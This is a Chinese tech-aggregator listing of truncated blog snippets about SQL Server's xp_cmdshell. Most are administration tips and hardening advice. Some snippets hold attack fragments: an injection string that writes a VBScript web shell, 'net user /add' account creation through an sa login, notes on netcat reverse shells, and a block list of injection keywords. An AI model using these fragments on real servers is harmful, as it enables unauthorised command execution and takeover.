E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
cmdshell
过滤sql的正则表达式和索引碎片的处理
alter|where|like|union|join|set|declare|from|count\(|drop table|update|truncate|asc\(|mid\(|char\(|xp_
cmdshell
·
2015-10-31 11:42
正则表达式
url的非法字符有哪些
需要过滤的特殊字符及字符串有: net user xp_
cmdshell
/add exec master.dbo.xp_
cmdshell
net localgroup administrators
·
2015-10-31 11:49
非法字符
SQL语句导入导出大全
/******* 导出到excel EXEC master..xp_
cmdshell
’bcp SettleDB.dbo.shanghu out c:\temp1.xls -c -q -S&
·
2015-10-31 11:37
sql语句
SQL数据库 - 预防非法表D99_Tmp,kill_kk的建立
kill_kk的出现是防止我们的网站不被攻击,同时也是SQL安全防范一道必要的防线,虽说利用这种方式攻击的人都是黑客中的小鸟,但是我们也不得不防,以免造成不可想象的后果,废话不多说了,说下防范方法: xp_
cmdshell
·
2015-10-31 11:39
kill
发现数据库中有D99_Tmp表的应对方法
发现数据库中有D99_Tmp表的应对方法一般的黑客攻击SQL Server时,首先采用的方法是执行master扩展存储过程xp_
cmdshell
命令来破坏数据库,为了数据库安全起见,最好禁止使用
·
2015-10-31 11:39
数据库
SQL数据库与文本文件之间的大批量数据互导
打開'xp_
cmdshell
' EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure
·
2015-10-31 11:02
文本文件
防止利用Xp_
cmdshell
进行漏洞攻击
Xp_
cmdshell
是sql数据库master库下面的系统存储过程,如果sa密码为空或者很容易被破解,则攻击者就会利用xp_
cmdshell
来执行任何command命令来操作您的computer。
·
2015-10-31 11:53
shell
SQL语句导入导出大全
SQL语句导入导出大全 /******* 导出到excel EXEC master..xp_
cmdshell
'bcp SettleDB.dbo.shanghu out c:\temp1.xls -
·
2015-10-31 11:48
sql语句
SQL语句导入导出大全
/******* 导出到excel EXEC master..xp_
cmdshell
’bcp SettleDB.dbo.shanghu out c:\temp1.xls -c -q -S"
·
2015-10-31 10:42
sql语句
master..xp_
cmdshell
xp_
cmdshell
以操作系统命令行解释器的方式执行给定的命令字符串,并以文本行方式返回任何输出。
·
2015-10-31 10:10
master
MSSQL复习1
创建数据库: exec sp_configure 'show advanced options' , 1 go exec reconfigure go exec sp_configure 'xp_
cmdshell
·
2015-10-31 10:04
MSSQL
MS SQL Server SQL语句导入导出大全
/******* 导出到excel EXEC master..xp_
cmdshell
’bcp SettleDB.dbo.shanghu out c:\temp1.xls -c -q -S&
·
2015-10-31 10:22
SQL Server
网络拷贝数据
USE master --映射盘符Z exec master..xp_
cmdshell
'net use z: \\192.168.0.117\c$ "密码" /user:192.168.0.117
·
2015-10-31 10:40
数据
MS-SQL使用xp_
cmdshell
命令导出数据到excel
exec master..xp_
cmdshell
'bcp "select c.Category_Title as 标题,p.Category_Title as 所属分类 from ltblGameStore
·
2015-10-31 10:47
shell命令
动态的调用DTS包
exec master..xp_
cmdshell
'dtsrun ...'
·
2015-10-31 10:36
动态
利用sql sa账号在远程机上创建window账户
通过sql server2000 sa账号进入查询分析器(进入默认数据库为master,因为xp_
cmdshell
存储过程在master表中),用下面两句新建window 账号 exec xp_
cmdshell
·
2015-10-31 10:54
window
SQL server 数据库危险存储过程删除与恢复
use master exec sp_dropextendedproc ’xp_
cmdshell
’ exec sp_dropextendedproc ’xp_enumgroups’ exec
·
2015-10-31 10:54
SQL Server
xp_
cmdshell
用法
http://blog.csdn.net/fwacky/article/details/5538147 一、简介 xp_
cmdshell
·
2015-10-31 10:52
shell
当SA遇到XP_
CMDSHELL
时
有时候在入侵的时候总是碰到先烦恼的问题,比如SA遇到xp_
cmdshell
时,如果管理员把xp_
cmdshell
删了怎么办呢?总是眼看着肉鸡跑了吧!
·
2015-10-31 10:39
shell
sql远程备份的使用
--备份环境:把数据库服务器(192.168.1.8)的数据库(TEST)备份到(192.168.1.145)的C$下 --首先,做一个与客户端的映射 exec master..xp_
cmdshell
·
2015-10-31 10:05
sql
Windows2003密码忘记
的管理员帐号,并且可以登录,尝试用下面的方法: 用管理员连接sql,在查询分析器中执行: --添加用户 exec master.dbo.xp_
cmdshell
·
2015-10-31 10:25
windows
SQL Server危险扩展存储删除和恢复[网络收集]
注册表,COM组件的破坏权限 MS SQL SERVER2000 使用系统帐户登陆查询分析器 运行以下脚本: use master exec sp_dropextendedproc 'xp_
cmdshell
·
2015-10-31 10:51
SQL Server
如何在不提升用户权限的情况下,使普通用户执行xp_
cmdshell
存储过程
iuG SQL R RC Server 2005 及之后的版本 nfGG37 背景 xp_
cmdshell
·
2015-10-31 10:53
shell
sql cmd
遇到sql server 2005 ,恢复xp_
cmdshell
的办法 SQL Server 已封锁元件 'xp_
cmdshell
' 的 程序 'sys.xp_
cmdshell
·
2015-10-31 10:22
sql
sqlserver2005 建库表sql语句
SELECT * FROM sys.databases WHERE name = 'StudyDB') DROP DATABASE StudyDB --如果存在则删除GOEXEC xp_
cmdshell
·
2015-10-31 10:33
sqlserver2005
向xp_
cmdshell
进军
向xp_
cmdshell
进军 ——利用MSSQL数据库存储扩展取得服务器的管理权 在MSSQL中具有sysadmin权限的用户可以通过xp_
cmdshell
存储扩展以system的权限执行任意系统命令
·
2015-10-31 09:42
shell
删除MSSQL危险存储过程的代码
2008-03-16 12:05 删除 use master exec sp_dropextendedproc 'xp_
cmdshell
' exec sp_dropextendedproc
·
2015-10-31 09:55
MSSQL
SQL Server SQL语句导入导出大全
/******* 导出到excel EXEC master..xp_
cmdshell
’bcp SettleDB.dbo.shanghu out c:/temp1.xls -c -q -S&
·
2015-10-31 09:54
SQL Server
SQL小工具--移动数据库物理文件
sp_configure ' show advanced options ' , 1 reconfigure go sp_configure ' xp_
cmdshell
·
2015-10-31 09:52
sql
MSsql2005如何启用xp_
cmdshell
默认情况下,sql server2005安装完后,xp_
cmdshell
是禁用的(可能是安全考虑),如果要使用它,可按以下步骤 -- 允许配置高级选项 EXEC sp_configure 'show
·
2015-10-31 09:51
sql2005
T-SQL从建库建表到添加约束添加数据和查询(注释不是很全)
EXEC sp_configure 'show advanced options',1;--打开某个服务RECONFIGUREEXEC SP_CONFIGURE 'XP_
CMDSHELL
',1;--设置为
·
2015-10-31 09:17
t-sql
SQLServer语句导入导出大全
/******* 导出到excel EXEC master..xp_
cmdshell
’bcp SettleDB.dbo.shanghu out c:\temp1.xls -c -q -S"
·
2015-10-31 09:05
sqlserver
SQL Server SQL导入导出语句
/******* 导出到excel EXEC master..xp_
cmdshell
’bcp SettleDB.dbo.shanghu out c:\temp1.xls -c -q -S"
·
2015-10-31 09:49
SQL Server
SQL语句导入导出大全
/******* 导出到excelEXEC master..xp_
cmdshell
'bcp SettleDB.dbo.shanghu out c:\temp1.xls -c -q -S"
·
2015-10-31 09:48
sql语句
SQL Server SQL语句导入导出大全
/******* 导出到excelEXEC master..xp_
cmdshell
’bcp SettleDB.dbo.shanghu out c:\temp1.xls -c -q -S"GNETDATA
·
2015-10-31 09:09
SQL Server
BCP批量导入导出
-U sa -P1 -c exec master..xp_
cmdshell
'bcp DbName.dbo.TableName in E:\test.sql -c -T' 2.权限配置 /
·
2015-10-31 09:32
导入导出
当SA遇到XP_
CMDSHELL
时
有时候在入侵的时候总是碰到先烦恼的问题,比如SA遇到xp_
cmdshell
时,如果管理员把xp_
cmdshell
删了 怎么办呢?总是眼看着肉鸡跑了吧!
·
2015-10-31 09:45
shell
饶过Xplog70.dll玩入侵
以前他是从WEB页面注入入手,然后直接用Xp_
cmdshell
添加系统用户搞定的,可晚上用3389登陆时突然发现添加的用户不在了,安装的后门都被清理干净,连Xp_
cmdshell
也执行不了。
·
2015-10-31 09:42
dll
关于mssqlserver安全性问题总结的10种方法
FilesMicrosoft SQL Server MSSQL$Install文件夹中的sqlstp.log, sqlsp.log和setup.iss 2、不安全的扩展存储过程:xp_
cmdshell
·
2015-10-31 09:12
sqlserver
远程删除Kaspersky(被Kaspersky搞了一天)
sqlserver还能连上,不过速度剧慢..........闯祸了吧拍拍后脑勺...先从gene6入手,看可不可以执行系统命令,在网上晃悠了半天,没果....再看看sqlserver2000,还好xp_
cmdshell
·
2015-10-31 09:39
asp
(MS SQL Server)SQL语句导入导出大全
SQL语句导入导出大全 /******* 导出到excel EXEC master..xp_
cmdshell
’bcp SettleDB.dbo.shanghu out
·
2015-10-31 09:08
SQL Server
Mssql安全设置
删除了调用shell,注册表,COM组件的破坏权限 use master EXEC sp_dropextendedproc ' xp_
cmdshell
·
2015-10-31 08:39
MSSQL
在linux下编译netcat并且反弹
cmdshell
本地Windows监听 nc -vv -l -p 1234 首先从sf上get一个tar的压缩包 wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz 然后当然是解压了 tar z
·
2015-10-31 08:10
linux
一个sql小工具之移动数据库物理文件
Code sp_configure 'show advanced options',1 reconfigure go sp_configure 'xp_
cmdshell
·
2015-10-30 20:11
sql
删除与恢复扩展存储过程 SQL 2000数据库
命令删除SQL的扩展 use master exec sp_dropextendedproc 'xp_
cmdshell
' exec sp_dropextendedproc 'xp_dirtree
·
2015-10-30 14:01
存储过程
sa下沙盘模式提权
sa下删除xp_
cmdshell
和xplog70.dll时候的一种办法,不算新的了, 也被一些人不断的再次提出来, 为了方便自己记忆再写出来, 在这种情况下,要执行命令,条件是要有xp_regwrite
·
2015-10-30 14:23
模式
记一次艰难的sql提权。
第一步:尝试xp_
cmdshell
xp_
cmdshell
' dir c:/ >> r.txt ' 提示找不到xplog70
·
2015-10-30 14:55
sql
数据库直接通过bcp导出xml文件
下面是测试语句 测试正常生成 请注意''和"的区别 以及相应开关是否打开 还有sqlserver的服务内置帐户等等 exec master..xp_
cmdshell
·
2015-10-30 14:14
xml
SQL SERVER将远程服务器的数据库备份到本地文件夹
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_
cmdshell
', 1;RECONFIGURE
·
2015-10-30 14:25
SQL Server
最详细的SQL注入相关的命令整理
keyno=1881;exec master.dbo.xp_
cmdshell
'echo ^<script language=VBScript runat=server^>execute request
·
2015-10-30 14:27
sql注入
上一页
5
6
7
8
9
10
11
12
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他